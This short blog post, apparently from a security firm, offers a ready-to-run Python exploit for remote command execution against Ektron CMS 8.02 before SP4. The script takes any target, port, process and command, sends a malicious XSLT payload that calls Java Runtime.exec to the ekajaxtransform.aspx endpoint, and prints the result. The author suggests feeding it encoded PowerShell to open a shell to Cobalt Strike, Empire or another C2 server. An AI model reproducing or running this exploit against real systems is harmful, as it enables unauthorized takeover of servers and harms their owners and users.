Hunnic Cyber - Logo

Ektron CMS 8.02 before SP4 Exploit

The exploit code is for Ektron CMS 8.02 before SP4 and is a very rough script to get you going.

If you find that Microsoft’s XSLT processor EnableScript is set to False, meaning this Metasploit module does not work, then perhaps the exploit below may save some time:

#! /usr/bin/python
import httplib

target = raw_input("""Enter the domain or IP address of target: 
e.g. www.google.com, or 198.162.0.1:  """)
port = raw_input("""Enter port number of target 
e.g. 80 or 443:  """)
process = raw_input("""Enter the process you wish to run: 
powershell.exe or cmd.exe:  """)
command = raw_input("""Enter command you wish to run: 
e.g. ping 127.0.0.1:  """)


def printText(txt):
    lines = txt.split('\n')
    for line in lines:
        print line.strip()

httpServ = httplib.HTTPConnection( target, port)
httpServ.connect()

payload = """
xslt=<?xml version="1.0"?>
<xsl:stylesheet version="2.0" 
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 
xmlns:java="http://saxon.sf.net/java-type">
<xsl:template match="/">
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'%s /C %s')"
xmlns:Runtime="java:java.lang.Runtime"/>
</xsl:template>
</xsl:stylesheet>""" % (process,command)

headers = {"Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept": "application/x-www-form-urlencoded; charset=UTF-8"}

httpServ.request('POST', '/WorkArea/ContentDesigner/ekajaxtransform.aspx', payload, headers) 

response = httpServ.getresponse()
if response.status == httplib.OK:
    print "Java Process Id: "
    printText (response.read())

httpServ.close()

Just run the script and you will be prompted to enter the target, the process you wish to start, and the command you wish to run in that process.

I would recommend PowerShell.exe, and a base64 encoded command to leverage a shell with Cobalt Strike, Empire, or whatever C2 you prefer/use.

Note: you do not need to put exclamation marks around your input when prompted.